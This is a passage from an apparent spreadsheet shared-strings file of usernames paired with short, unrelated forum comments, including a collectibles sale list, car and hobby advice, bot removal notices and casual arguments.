    <t>[Proof](https://imgur.com/a/xrNqGy1) Additional pictures upon request US shipping only Shipping is $4 for one item, additional items will be calculated upon request PLEASE make offers for items if you disagree with price. I am pretty lenient on most of the items. I just want this stuff gone. ***POPS*** * SDCC Toucan $25 * Dino 6000 pc $20 * Elwood 3000 pc $25 * Harley Quinn Imposter $8 * D\*ck in a Box $10 * Teebo, Chief Chirpa &amp; Logray $20 * Marcus Fenix $9 * JD Fenix Bestbuy GITD excl $15 * Venomized Iron Man $8 * Mega Man 8 bit GS excl $8 * The Atom $7 * Snowball Flocked Comic con Excl $14 * Sara Ryder $5 * Eve earth day boxlunch Excl $18 * Pete $8 * Shadow Heartless $7 Each * Sora (Drive Form) Bestbuy Excl $12 * Sara Ryder (Masked) GS Excl $6 * Army Man ECCC excl $20 * Mickey $8 * Organization 13 Mickey BoxLunch Excl $10 * Organization 13 Mickey SDCC Excl $12 * Halloween Town Sora Hot Topic Excl $25 * Liam Kosta $6 * Army Man Metallic Boxlunch Excl $15 * K-2SO NYCC Excl $10 * Scarif Stormtropper $7 * Batman SDCC Excl $12 * The joker Target Excl $10 * Grey Worm (NO BOX) $10 ***MINIS*** * Grey Worm $20 * Pete GS excl $8 * Tron Minis $12 ea or $30 for the set * Sora $12 * All others \~$7 ea ***EVERYTHING ELSE*** * Chase Melisande Dorbz $18 * Stan Lee Pez $8</t>
  </si>
  <si>
    <t>NoBoDe</t>
  </si>
  <si>
    <t>Originally posted by Akki: ↑ I'm a huge fan and proponent of urban gardens, primarily for the homeless &amp; the disadvantaged but it doesn't end there with the amount of people now living in apartments without yards. Councils should allocate small areas of parkland within the cities or on the edge to encourage this. You can do a lot with a very small space. https://www.sbs.com.au/food/article...2iUR0PqU9Bm6d0h6d3bGDyojHXZREniKWThyvu3YgkWbs Expand + and</t>
  </si>
  <si>
    <t>billsil</t>
  </si>
  <si>
    <t>That doesn’t really make sense. While it’s possible, an STL is a triangulation and isn’t going to represent any curve accurately. It’s a whole lot better to start at a native CAD format.</t>
  </si>
  <si>
    <t>Quitepye7</t>
  </si>
  <si>
    <t>Apparently Nintendo had made squidphone cases last year for iPhones, but it was only released to japan markets.</t>
  </si>
  <si>
    <t>MonkeyPuzzles</t>
  </si>
  <si>
    <t>So what can a pro workstation range do that a regular can't? Extra mem channels? pcie lanes? Phaps new the Pro is a new socket with a higher power draw? If they keep adding cores that's got to happen sometime.</t>
  </si>
  <si>
    <t>MeyerholdsGhost</t>
  </si>
  <si>
    <t>What I mean is, my save existed before beyond. I have built the message modules since. It said I could place five per planet, so I used them to write an evolving poem at my base. This was only a couple of days ago.</t>
  </si>
  <si>
    <t>Greatestwrapperalive</t>
  </si>
  <si>
    <t>Hey thanks for the adivce. I plan on being there early in the morning on a Friday. Hopefully I can beat people to the sites. Im hiking the Ganaraska Trail from the Devil's Lake access road. Im hoping its not too crazy and someone will share a site of I need it. Hopefully one of the four sites along the trail are free</t>
  </si>
  <si>
    <t>supercleanbro</t>
  </si>
  <si>
    <t>Thanks friend! I just added it to my wish list.</t>
  </si>
  <si>
    <t>Pongoid</t>
  </si>
  <si>
    <t>u/avidrationalist asked us to, "Show me a fantasy novel where Space, Time, matter, energy, gravity, Newtonian mechanics, Chemistry, Biology or math is not the same as ours." Tell me u/Jezer1, where does u/avidrationalist ask for "a world that functions somehow without time or [with a] physics concept replacing time"? A Time Turner could only exist in a world where time and physics as we know it are wrong. However, I'll grant you that better examples exist so I'll provide one: “Slaughterhouse Five” by Kurt Vonnegut. In this novel, an alien race known as Trapfamdorians interact with reality in four dimensions and can experience any point in time that they choose. They essentially live a life without time. I'm eager to see where the goal posts will be moved to next. Please let me know. HOWEVER, all this is beside the point, I could list examples all day (well, someone smarter than me could) and it wouldn't prove my point. Conversely, my inability to list examples all day wouldn’t disprove my point. In response to u/Finn-windu saying that KKC takes places in a different world than ours and things could be different (a modest assertion as many things are different!) u/avidrationalist made the ponderous response, "I have never read any fantasy where the bare bones of our reality were not there. Show me a fantasy novel where Space, Time, matter, energy, gravity, Newtonian mechanics, Chemistry, Biology or math is not the same as ours." I gave examples of all of these to varying degrees of accuracy, but even if everything I said was flat out wrong, it still does not mean that things could not be different (and many things are!!!) between KKC and earth. The vastness of fiction is not bound and constrained by the imagination of u/avidrationalist. And aren’t we glad of that? In other words, I don’t need to provide nine perfect examples of space, time, matter, energy, gravity, Newtonian mechanics, chemistry, biology, and math working differently for things to be different from earth in a fantasy novel! They are already different in many ways and this could be just another. It shouldn’t take someone saying, “Hey, look at this unrelated novel. Time is different for some aliens so now you can believe that the Adem potentially asexually reproduce.” That’s ludicrous. PS: How is asexual reproduction harder to believe than time travel?! There are extant vertebrate species on earth that can do it now, we’ve never seen anyone, anywhere travel back in time… ever.</t>
  </si>
  <si>
    <t>seegeewhy</t>
  </si>
  <si>
    <t>I'm turning 29 in a week and am convinced I'm seeing my scalp more than I used to. Paranoid about losing my hair but I have no history of it either side of the family. Any balding FTers that can tell me what to look out for?</t>
  </si>
  <si>
    <t>bladeconjurer</t>
  </si>
  <si>
    <t>They technically could only store character 3 and 5, and still not know the password. Not like that's a smart idea anyway.</t>
  </si>
  <si>
    <t>skeezix</t>
  </si>
  <si>
    <t>3JOH22A said: ↑ What tires and tire pressures are you running? Surprisingly this has a bigger impact on ride quality on pavement than springs and shocks. For example, load range C rides noticeably harsher over bumps and potholes than P-metric. Load range E rides noticeably harsher than load range C. Also try lowering your tire pressure to ~29 psi. Click to expand... I ran a set of Bridgestone Revo II tires at 28 psi because that was what the sticker on my door jamb said to run them at. About 10,000 miles later I began to notice a slight vibration. At at 15,000 miles the vibration grew worse and I thought I had a balancing problem somewhere else in the truck. At 18,000 miles I was shown some significant cupping and signs that the tires were underinflated. Perhaps the sticker was custom-made for the tires that came with the truck when it was new ( Goodyear GSA tires). I dunno. But those tires just would not balance at all, so no more Goodyear tires for this puppy. After 20,000 miles on the tires I installed a set of Michelin tires. They now have 15,000 miles and are not cupped and they cause no vibration. I keep them inflated at 36 psi. That gives them a pretty hard ride (not a good thing) but at least maybe I'll get 40K out of them...</t>
  </si>
  <si>
    <t>my_shadow22</t>
  </si>
  <si>
    <t>I’m your trip guide for the next bit of time. Listen to Sweat, Undertow, Flood, 46&amp;2, Pushit, Third Eye, Intension, Lateralus, Rosetta Stoned, Jambi, Aenema then when finished, go watch Babymetal live at Tokyo Dome and follow them into the hole.</t>
  </si>
  <si>
    <t>Eliyanef</t>
  </si>
  <si>
    <t>You never see family cars that are green or yellow, only the smaller models</t>
  </si>
  <si>
    <t>Chad156</t>
  </si>
  <si>
    <t>Go to a game and get hooked!</t>
  </si>
  <si>
    <t>Jogilito</t>
  </si>
  <si>
    <t>Yeah, this tip is useful, thanks</t>
  </si>
  <si>
    <t>Nosey_Canus</t>
  </si>
  <si>
    <t>Try outlining the gem with a “metal”. Yellow, white, and black are used to separate colors and keep them from “bleeding” into each other.</t>
  </si>
  <si>
    <t>hcj9m</t>
  </si>
  <si>
    <t>I’m from cville, trump vineyards is not popular because trump but it’s used to be called kluge and the wine was known for being quite good. In classic trump style they ruined a perfectly good vineyard with their damn name</t>
  </si>
  <si>
    <t>Amanda30697</t>
  </si>
  <si>
    <t>Karen usually, as most you internet fellows know, refer to the generic stereotype of an entitled person with a bad attitude. I’ve used the term in irritation many a time but I never usually connect it with my Mom. I love my mom dearly and she couldn’t be farther from that description. I guess I just find it weird. I also wonder why the name chosen was Karen? There are other generic entitled lady names of coarse but this once seems to get used most often.</t>
  </si>
  <si>
    <t>Inithis</t>
  </si>
  <si>
    <t>What does it all add up to?</t>
  </si>
  <si>
    <t>RedditMayne</t>
  </si>
  <si>
    <t>Not their real hair...just cut-outs make to look it look funky.</t>
  </si>
  <si>
    <t>bmwm3186</t>
  </si>
  <si>
    <t>I ran into a guy that used to sell stances all the time and he said they saw them break all the time. Said the design would be better with a material like titanium or steel but aluminum can't take the flexing over time</t>
  </si>
  <si>
    <t>steinbolt</t>
  </si>
  <si>
    <t>He didnt steal anything, Cormier just handled him the belt by not wrestling...</t>
  </si>
  <si>
    <t>rcquintino</t>
  </si>
  <si>
    <t>Thanks!</t>
  </si>
  <si>
    <t>--jupiter--</t>
  </si>
  <si>
    <t>Hello r/MK! I'm planning my first build and was wondering if the T1 tactile switches from [here](https://www.primekb.com/products/tactile-switches) are A. Legitimate T1s B. Compatible with the RGB on the dz65 PCB from kbdfans Thanks for any help!</t>
  </si>
  <si>
    <t>It looks like you've posted something related to politics, religion, or social justice. As such, your submission has been removed. ------ **IMPORTANT: Please read [our rules](https://www.reddit.com/r/Showerthoughts/wiki/rules) and [the FAQ](https://www.reddit.com/r/Showerthoughts/wiki/faq)** ***in their entirety*** **before messaging the moderators.** Enquiries which have already been answered by these pages will not receive a response. Please also [do a Google search](http://www.google.com) for your thought to ensure that it is both original and unique. ------ *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/Showerthoughts) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>shaan1232</t>
  </si>
  <si>
    <t>Awkwardly, terribly, I still think about it since it keeps me awake some nights. However, I did end up fucking her friend a couple of days after so it turned out alright.</t>
  </si>
  <si>
    <t>SSN-700</t>
  </si>
  <si>
    <t>"I know what I've done" Ooof, easy there, hero. What military then? And yes I assumed US but that is why I asked,, to make sure. I do not care about what happens in other countries, but aside from some really select units, you won't learn anything about cutting throats in the US mil, or most (all?) other NATO countries. Cutting throats is for backwards savages stuck in the dark ages.</t>
  </si>
  <si>
    <t>Here's a sneak peek of /r/fatlogic using the [top posts](https://np.reddit.com/r/fatlogic/top/?sort=top&amp;t=year) of the year! \#1: [Tell my arse that CICO doesn’t work.](https://i.redd.it/xvs5a25eg7d11.jpg) | [277 comments](https://np.reddit.com/r/fatlogic/comments/93b2d2/tell_my_arse_that_cico_doesnt_work/) \#2: [The Onion gets it](https://i.redd.it/gyvvi7dwqze21.png) | [148 comments](https://np.reddit.com/r/fatlogic/comments/antr06/the_onion_gets_it/) \#3: [\[Sanity\] Smoker's Acceptance](https://i.redd.it/49wd97o27jh21.png) | [190 comments](https://np.reddit.com/r/fatlogic/comments/asaoo9/sanity_smokers_acceptance/) ---- ^^I'm ^^a ^^bot, ^^beep ^^boop ^^| ^^Downvote ^^to ^^remove ^^| [^^Contact ^^me](https://www.reddit.com/message/compose/?to=sneakpeekbot) ^^| [^^Info](https://np.reddit.com/r/sneakpeekbot/) ^^| [^^Opt-out](https://np.reddit.com/r/sneakpeekbot/comments/ciakte/blacklist_vi/)</t>
  </si>
  <si>
    <t>OldMork</t>
  </si>
  <si>
    <t>just have to go back 2-3 generations to find someone who went to war, or lived during war, and there were guns everywhere. Probably thousands of pistols and other small guns in safes, but they would never fire again its just memorabilia.</t>
  </si>
  <si>
    <t>AverageJoeAudiophile</t>
  </si>
  <si>
    <t>Stop with this you post to the donald stuff. This is not the sub for that.</t>
  </si>
  <si>
    <t>&gt;&gt;475252037 It's lore accurate to the brain development of South Underrail people.</t>
  </si>
  <si>
    <t>Railcarmover</t>
  </si>
  <si>
    <t>Quote: : Wow, so there is one here! Does anybody know if parts are available for them or do Zenith or Tilly parts fit? Sidetracking a bit here but in one of my sheds, I have a carb that looks like a Zenith but is a Japanese copy. From memory, It is KTK branded and made by the Tokyo Carburettor Co Ltd.. It looks like a zenith - does anybody know about those and do zenith parts fit? What drew my attention to it was the colour of the enamel on it - a deep maroon. I've never seen another one like it. http://www.rennerscorner.com/index.html</t>
  </si>
  <si>
    <t>axollot</t>
  </si>
  <si>
    <t>The age and date hit home for me as Maddie and my youngest could pass for siblings. Same age. Taken on daughter's bday! Needless to say this one stuck with me. Had very real anxiety over the ease in which she could be removed from Portugal. *Either into Northern Africa or Spain. Either way traffickers active in area and they didn't road block the borders.* IMHO. Some of the blocks done 24hrs later were not fully manned or very serious. It's a stark reminder of how difficult things can get on international travel to non-native language/dif legal systems (Most English countries and many non English use English Common Law. It's therefore very similarly set up when dealing with authorities...) Portugal like many other EU countries uses Civil Law. Not precedent and the differences start with the way PD do NOT interact with the families...and the laws/protocol are so very different too. Reminder to take extra precautions ANYWHERE one travels. Just so much empathy for the parents dealing with Portuguese authorities under these circumstances.</t>
  </si>
  <si>
    <t>antiquedoge</t>
  </si>
  <si>
    <t>Unfortunately people are gonna have to be a little nicer before this happens. This isn't a pointed comment at you, but there's definitely a lot of pre op folk who don't approach post op folk in ways that feel comfortable to ask about bottom surgery which is why the communities can feel so closed off around that.</t>
  </si>
  <si>
    <t>pacho88</t>
  </si>
  <si>
    <t>And im a transgender black jew. How dare you be such a bigoted antisemite racist transphobic pos?</t>
  </si>
  <si>
    <t>MartianRecon</t>
  </si>
  <si>
    <t>https://www.bbc.com/news/uk-england-nottinghamshire-45019803 If they're not listening to their customers than explain this one.</t>
  </si>
  <si>
    <t>tacominnie</t>
  </si>
  <si>
    <t>Seriously agreed. As a whiskey aficionado, I have at this point sorta just given up on finding any "super special occasion" bottles here, and instead make a plan to enjoy one as a celebration when I visit my dad-in-law in a state that isn't so dark ages about alcohol and actually allows private stores.</t>
  </si>
  <si>
    <t>indochild</t>
  </si>
  <si>
    <t>310,686 miles for those who are curious</t>
  </si>
  <si>
    <t>jeffislearning</t>
  </si>
  <si>
    <t>Just practicing karate moves in an elevator. Nothing to see here.</t>
  </si>
  <si>
    <t>Thank you for your submission to /r/MusicInTheMaking. We want to ensure everyone gets feedback and contributions in their project posts. Therefore, please remember to participate in a couple of other recent submissions each time you post. This is karma in action. Give to others when you want something in return. Please select flair for your post indicating the help you seek most at the moment. Look for the 'flair' option below the title of your post. Once your project is complete, change the flair to "finished". *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/MusicInTheMaking) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>rustyfender3</t>
  </si>
  <si>
    <t>She needed a good nights sleep, is what she needed.</t>
  </si>
  <si>
    <t>LegendGamer320</t>
  </si>
  <si>
    <t>ask this a lot to see if you gots balls, but kinks?</t>
  </si>
  <si>
    <t>deadlygr</t>
  </si>
  <si>
    <t>Demn blizzy looks so heartbroken</t>
  </si>
  <si>
    <t>bruceridesthestyrker</t>
  </si>
  <si>
    <t>i would put a different source for fuel supply on the bike. make a small shop tank and get the bike warm then swap it to alternate fuel source. it is possible your supply from the petcock is restricting fuel at idle causing a high idle.the petcock can cause problems you might even try to put it on prime and make sure your fuel is flowing good.and then see if the fuel petcock is restricting the fuel. the bike will idle high when lean turn the mixture screws out.what does the color tune show?</t>
  </si>
  <si>
    <t>1soooo</t>
  </si>
  <si>
    <t>Time to scourge taobao for this soon :)</t>
  </si>
  <si>
    <t>Colliemellon</t>
  </si>
  <si>
    <t>...you’re either not very funny or not very smart, not sure which. Maybe both.</t>
  </si>
  <si>
    <t>&gt;&gt;53964675 &gt;Height 5'9" &gt;Personality Cold and cynical, also shy. &gt;Weight 142lbs &gt;Flaws Autism, mutt, socially inept, brainlet, loner.</t>
  </si>
  <si>
    <t>Knotaj</t>
  </si>
  <si>
    <t>I think you shouldn't ask for peoples password, nobody is going to just enter their credentials there.</t>
  </si>
  <si>
    <t>MetatronStoleMyBike</t>
  </si>
  <si>
    <t>51: England 52: Wales 53: Scotland 54: Ireland?</t>
  </si>
  <si>
    <t>Justin</t>
  </si>
  <si>
    <t>Looking for new clients no job to small good rates call or txt Justin thanks</t>
  </si>
  <si>
    <t>DylonNotNylon</t>
  </si>
  <si>
    <t>Bruh, we gotta disagree to disagree on... pretty much everything you've said in this thread.</t>
  </si>
  <si>
    <t>USModerate</t>
  </si>
  <si>
    <t>&gt; Jellyfish Joe</t>
  </si>
  <si>
    <t>MagicJasoni</t>
  </si>
  <si>
    <t>It will take a long time for Norway to drop down the list because they had **one** mass shooting. Yet, interestingly, which country do you think most people with common sense would say when asked: "Which country do you think if safer or less violent: Norway or America?"</t>
  </si>
  <si>
    <t>xGTAxVidsx</t>
  </si>
  <si>
    <t>(In alphabetical order). Andrew Price, the famous and amazing Guru of Blender. * https://www.blenderguru.com * https://www.youtube.com/user/AndrewPPrice/videos Darrin Lile, a Blender Foundation Certified Trainer. A superb master of Blender. * https://blender101.com * https://www.youtube.com/user/DarrinLile/videos Zacharias Reinhardt (CG Boost). Zacharias is the master of sculpting, texturing, lighting, etc.. and his artistic skills are just incredible. * https://cgboost.com * https://www.youtube.com/watch?v=1o0ni0IbnRI * https://www.youtube.com/channel/UCWWybvw9jnpOdJq_6wTHryA/videos</t>
  </si>
  <si>
    <t>thiccneyspears</t>
  </si>
  <si>
    <t>The weird thing is she didn't really...criticize him?? She said "we'll see how long that lasts" and then started talking about how his schedule OVERALL seemed overwhelming for a child. If you watch the video she says something along the lines of ballet being overwhelming on it's own. This is what happens when people take things out of context and spew this cancel culture bullshit on twitter.</t>
  </si>
  <si>
    <t>Tutzimo</t>
  </si>
  <si>
    <t>I don't want to join anyone. So, if I jump into my game, I could just stumble over a stranger? No notifications, no markers and everybody who's playing is visible? I thought, they just would have make the lobbies bigger than before</t>
  </si>
  <si>
    <t>Bitanator</t>
  </si>
  <si>
    <t>Shane said: New album from Suicidal Angels is pretty damn good. Click to expand... Click to shrink... Agree</t>
  </si>
  <si>
    <t>hyphygreek</t>
  </si>
  <si>
    <t>Plenty of old school skate too. But they don't venture away from Venice. The roller bladers will get all the way to Pacific Palasades just as a workout.</t>
  </si>
  <si>
    <t>MLGBearBoss</t>
  </si>
  <si>
    <t>Well actually the baby bird died.I asked my cousin if he saw it and he said it died. I really couldn't do much coz there are no animal centers near me and I don't have any experience with taking care of birds. If I kept it,it would have died anyways. I am really sad about the bird coz there was nothing I could do. :(</t>
  </si>
  <si>
    <t>js247</t>
  </si>
  <si>
    <t>Roped into this first time by a coworker. I have no idea what I'm doing. Is there a FPL for complete morons guide I can catch up a bit and not be completely horrible??</t>
  </si>
  <si>
    <t>XTeslaCoyleX</t>
  </si>
  <si>
    <t>I like his design, I like the concept of his abilities. I found him fun in day one of release but already I am quickly realising some characters basically can't win against him and getting fed up of the obscenely unjustifiable damage that most of his moves do. I didn't like the announcement as it was another swordfighter but the presentation of his character filled me with hope. I still believe he's a good character but I think he needs nerfs to elements of his kit to make it not instantly the best in the game/one of the best. I've played him and he's not for me which is fine. Banjo will likely be more my type. But I just think this current DLC is deliberately OP currently to drum further interest in the East for Smash, and attract the West to Dragon Quest franchise</t>
  </si>
  <si>
    <t>Hello! Your post has been automatically removed because you did not include a minimum of one required tag in the title. Please keep in mind the title tag must be typed IN THE TITLE of your post and retain their SQUARE brackets as shown below, on Reddit Redesign and old reddit you still must type it into the title, you cannot select your tag anywhere, you must type it! All posts on the subreddit require at a minimum of one tag surrounded by square brackets in the title to describe what kind of content it is, these are the only current tags you can use and they are case-sensitive &amp; spelling sensitive, so check the spelling and brackets on your title if you continue to get this message. The allowed tags are as follows: [Non-LGBT] [Crushes] [Article] [Picture] [Video] [Audio] [Rant] [Sexual Health] [Coming Out] [Family/Friends] [Discussion] [Relationships] If you are still confused on how to use the tag system all you do is pick at least one of the above tags, then place the written tag somewhere in your post title (Do not forget the square brackets surrounding each tag [] ) here are some correct &amp; incorrect titles to help you out. Example correct title: I found out my crush likes me! [Crushes] Notice the square brackets and capitalization and correct spelling! Example correct title: [Coming Out] [Family/Friends] How do I come out? Notice the spelling/brackets &amp; capitalization is consistent and location of the tags do not matter. Example incorrect title: I found out my crush likes me! (Crushes) Notice the parentheses instead of square brackets Example incorrect title: Anyone else find Tom Holland stupidly hot? [Dicsussion] Notice the misspelled Discussion Once you have a correct title with a tag all you have to do is submit the post and the bot will do the rest for you and now users can sort your content by the tags! If you have any more questions feel free to contact the moderators in ModMail. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/LGBTeens) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>jkbpttrsn</t>
  </si>
  <si>
    <t>Jesus dude, I usually agree with you on here a lot but this is childish.</t>
  </si>
  <si>
    <t>noley</t>
  </si>
  <si>
    <t>Well, my two Tele’s are not true ‘traditional’ as one has HB’s and the other has Barden rails so in that respect the Iconic appeals to me. It’s a looker (as all 52 models are) I can’t see what makes it a $2600 guitar but if you’re looking for the truest Tele setup of these three, this is is it. I’ve wanted a Thinline for a while so I’d dig that too. It will have a different sound being semi-hollow but they sure look sweet with the binding. What color is it? I have no interest in a Tele body with 3singles, and I’m guessing you too as you already have a Strat? But...if you go to the trouble and expense of taking it back to it’s original layout you have a real deal Fender Telecaster. Congrats on getting offers that are actually worth considering!</t>
  </si>
  <si>
    <t>karategojo</t>
  </si>
  <si>
    <t>They are so different from each other but easy to do. Lace ones are just doily middles and stop on the last two rows to make a flat side. Crochet around wire and attach to the headband and sew the bottom to the headband. Otherwise I used a round template for rows and adjusted to make round sides, and used cross stitch patterns for the color block.</t>
  </si>
  <si>
    <t>Late_Sleeper123</t>
  </si>
  <si>
    <t>What is the best "You made your bed, lay in it." moments in history?</t>
  </si>
  <si>
    <t>wintertime0411</t>
  </si>
  <si>
    <t>No. Itachi and kisame would’ve bodies jiraiya.</t>
  </si>
  <si>
    <t>DrDemento</t>
  </si>
  <si>
    <t>Damn I was sure it was split. Always had multiple PS4/3/2’s in the house, though, so must have used two.</t>
  </si>
  <si>
    <t>JB4GDI</t>
  </si>
  <si>
    <t>Thanks for sending this along! I'll get to this as soon as I can.</t>
  </si>
  <si>
    <t>MamaMambo</t>
  </si>
  <si>
    <t>Child support giving the right to visitation is also dependent upon location. You're absolutely correct in states that handle it that way. I can only speak from my experiences with family court in the two states I've dealt with it in. It also can depend upon their marital status at the time of the baby's birth, again depending upon location. The state I have experience in gives fathers almost no rights to visits if the couple are unmarried until established otherwise. I do definitely agree, not all money is good to have. I totally understand OP wanting to "get even" by taking him for all he's worth but it could come back to really hurt her in the long run. Being tied to a man like that for money he may or may not actually pay isn't worth the emotional turmoil.</t>
  </si>
  <si>
    <t>Hospital Corpsman</t>
  </si>
  <si>
    <t>I worked at US Navy full-time for more than 8 years Pros Former sailor of almost 9 years. Honestly, Its different from the cooperate world. Getting fired is nearly impossible. If you're married they will pay you extra and automatically give housing allowance. It's a great way to learn many different things that is not your job. All in all. In my personal experience, no matter what the situation was. It was a non-regrettable one at that. To serve was an honor. You don't... do it to impress others. You do it to better yourself, hone your discipline and better your country. Show More Cons Sea duty, you are always away from home, underway, or on deployments. So thats normal. also, you signed up to serve your country. Not get married at the age of 18 once you enter the service. Go do that somewhere else please. Advice to Management My only real complaint is please rework the advancement system in the US Navy. Sailors need to be reprimanded more for accountability. I've seen way to many Irresponsible sailors make rank way to fast.</t>
  </si>
  <si>
    <t>BobQuasit</t>
  </si>
  <si>
    <t>So he is giving up his seat in the House of Representatives?</t>
  </si>
  <si>
    <t>Lokis_Mom</t>
  </si>
  <si>
    <t>According to RS it favors Blake. He wrote more about it than the paragraph posted above.</t>
  </si>
  <si>
    <t>DrMantis_Tobbagan</t>
  </si>
  <si>
    <t>Learn to read. The comment was in response to a comment that said the show predicted a lot of things. The show didn’t predict a handsome, charming, and rich politician would beat the career bureaucrat.</t>
  </si>
  <si>
    <t>maywind</t>
  </si>
  <si>
    <t>As far as Chinese fans are concerned, Krystal's career is over.</t>
  </si>
  <si>
    <t>bickerstoff</t>
  </si>
  <si>
    <t>I would second both meet ups and recruiters. There are probably recruiters in the area that specialize in technology positions. Knowing that you are graduating in December is tricky for employers because they need help now and either have to wait for you to come on board after graduation or accommodate your classes. Don’t lose hope; you’ll make it.</t>
  </si>
  <si>
    <t>Husdjur</t>
  </si>
  <si>
    <t>!invest 100%</t>
  </si>
  <si>
    <t>lfgallaher</t>
  </si>
  <si>
    <t>It really is but also it’s later in the UK so maybe everyone is just asleep????</t>
  </si>
  <si>
    <t>InfiniteFeet</t>
  </si>
  <si>
    <t>what’s the deal with the blank/greyed out share options?</t>
  </si>
  <si>
    <t>shakyfrog</t>
  </si>
  <si>
    <t>I've had a hard year for a bunch of reasons and feel really down on myself. I would be so grateful for some kindness. I hope you're all having a great day!!!</t>
  </si>
  <si>
    <t>TruckloadAndy</t>
  </si>
  <si>
    <t>Hi there, Can anyone recommend the most economical data plan you know for truck GPS? Thanks !</t>
  </si>
  <si>
    <t>Vectrus</t>
  </si>
  <si>
    <t>Cheesemaking. Part of why I’m more into reddit right now.</t>
  </si>
  <si>
    <t>imstup1dho333</t>
  </si>
  <si>
    <t>He’s BLIND and your kid came into his space and your dog gave warnings before. Idk how you didn’t see this coming. Put up baby gates?? Like why does your dog have to pay for your inability to watch your child with his life?</t>
  </si>
  <si>
    <t>bennybaku</t>
  </si>
  <si>
    <t>So many were sure CBS was hoping to put the Ramseys on trial. But this was about Burke. And we know the BPD couldn’t find any evidence against Burke. I don’t think they had much to give them even if the BPD opened their files on Burke.</t>
  </si>
  <si>
    <t>texans1234</t>
  </si>
  <si>
    <t>Nope I’m just a regular jackass like you. I knew you wouldn’t give an answer. I told you you wouldn’t give an answer. And you didn’t. Sadly predictable. You just KNOW that everybody sucks, but just can’t quite figure out who would do a better job right now. Sounds like you’d like to go into the season with no head coach and no o line coach. Great plan. /s</t>
  </si>
  <si>
    <t>Tanzania_</t>
  </si>
  <si>
    <t>Get yourself a Molke. They’re insanely comfortable! There’s a great calculator at a website called boob or bust to get your size (although Molke have a calculator too). You will love them. They’re all I wear now and the colours/prints are such fun. Free returns should you need to change the size and there’s a buy/sell/trade group on Facebook (molke b/s/t) plus Fans of Molke Page too for fit advice etc and prints/fabrics they no longer sell new. I reckon you will love them. As an aspie with large tits and who breastfeeds, they’re simply the most comfortable bra I have ever, ever worn and when my kids were little I even slept in them.</t>
  </si>
  <si>
    <t>247planeaddict</t>
  </si>
  <si>
    <t>As a girl I personally think men brave enough to not act like the "typical men" 24/7 are really attractive but yeah, you’re probably right.</t>
  </si>
  <si>
    <t>Urban_Maniac</t>
  </si>
  <si>
    <t>How about both at the same time ?</t>
  </si>
  <si>
    <t>Living_Life_Well</t>
  </si>
  <si>
    <t>Congratulations and love to you too, sober twin!</t>
  </si>
  <si>
    <t>MemeMaster225</t>
  </si>
  <si>
    <t>Hey, at least I’m not leeching off of Pewdiepie’s Minecraft series, desperately clawing at anything that could give me even the slightest crumb of karma. No. Unlike you, I have some originality and don’t rely on a YouTuber to provide all my content for me.</t>
  </si>
  <si>
    <t>gorhrut</t>
  </si>
  <si>
    <t>if you are trying to stop movement from multiple directions, you could try: if( Input.GetButtonDown("S") ){ if( rigidbody.velocity.x &gt; 0 ){ rigidbody.velocity.x -= 1;} else if( rigidbody.velocity.x &lt; 0 ){ rigidbody.velocity.x += 1;} // do the same for velocity.y and velocity.z this would effectively dissolve all ship velocity, and slowly bring it to a stop. this isnt going to be quite as smooth as the PID would be, but it should work.</t>
  </si>
  <si>
    <t>vaultdweller501</t>
  </si>
  <si>
    <t>After doing some research on what Quantum is supposed to taste like I think that liberty brew is like Quantum in flavor. Just add that isotope to make it glow and boom we have Nuka Cola Quantum.</t>
  </si>
  <si>
    <t>ghostNest</t>
  </si>
  <si>
    <t>How old are you?</t>
  </si>
  <si>
    <t>HungarianNewfy</t>
  </si>
  <si>
    <t>I believe this is why everyone should have a Switch! Video games, beautiful weather, peace and quiet</t>
  </si>
  <si>
    <t>Christie and Cliff just gave each other a good ass-kissing.</t>
  </si>
  <si>
    <t>SlutMachine</t>
  </si>
  <si>
    <t>Rules for thee, apparently.</t>
  </si>
  <si>
    <t>Dzjezzie</t>
  </si>
  <si>
    <t>Do some brand-checks or ask this reddit before buying something. Do some brand searches on the web also.</t>
  </si>
  <si>
    <t>Sir_Boofington</t>
  </si>
  <si>
    <t>Fair enough</t>
  </si>
  <si>
    <t>SpeakeasyImprov</t>
  </si>
  <si>
    <t>Thanks, it's early yet and this is the funniest thing I've read all day.</t>
  </si>
  <si>
    <t>Bananasinmypocket</t>
  </si>
  <si>
    <t>Well now it’s disinfected</t>
  </si>
  <si>
    <t>Hhdhdbdnenen</t>
  </si>
  <si>
    <t>Its incredibly racist and a huge dogwhostle Also its untrue Bte itd not whataboutism to point out u had no complaonts when the black guy does it but hate it when the whitee guy does it. (Or doesnt)</t>
  </si>
  <si>
    <t>MarmaladeSki_s</t>
  </si>
  <si>
    <t>Simply, not at all is the best way.</t>
  </si>
  <si>
    <t>Harry_Paget_Flashman</t>
  </si>
  <si>
    <t>Coming from a country with strong controls on guns my perspective is that although defending your life is a natural right, a more important right is not even needing to defend it in the first place, although I appreciate that might not be a practical position in the US given the large number of guns already in circulation. Swedish immigration policy does seem to be becoming more strict, presumably in response to the large number of asylum claims they have seen in recent years (similar to many other EU countries) but it's worth remembering that as a member of the EU, Sweden allows citizens of any of the 27 other EU countries to live and work there with no kind of application process or paperwork required. In addition, as a Schengen country, the land borders to Sweden are completely open so a person from, for example, Slovakia or any other EU country, could just drive over the border (which in most Schengen countries is just a sign stating "Welcome to ...) and start living and working there.</t>
  </si>
  <si>
    <t>BlueFlagFH</t>
  </si>
  <si>
    <t>It wasn’t to give Tomori game time as he was set to go on loan to Everton before this and lampard withdrew after the Luiz debacle. It was clearly something with the dressing room, as he banned Luiz from training. I’m fine with him going as it gives Christensen and Zouma more of a chance. Just not to arsenal for 8mil. We paid 18mil for Giroud not long ago, I think that’s a good comparison.</t>
  </si>
  <si>
    <t>StahrofPforzheim83</t>
  </si>
  <si>
    <t>My Fellow Americans had a pretty good plot twist at the end.</t>
  </si>
  <si>
    <t>Yuyuyakuza</t>
  </si>
  <si>
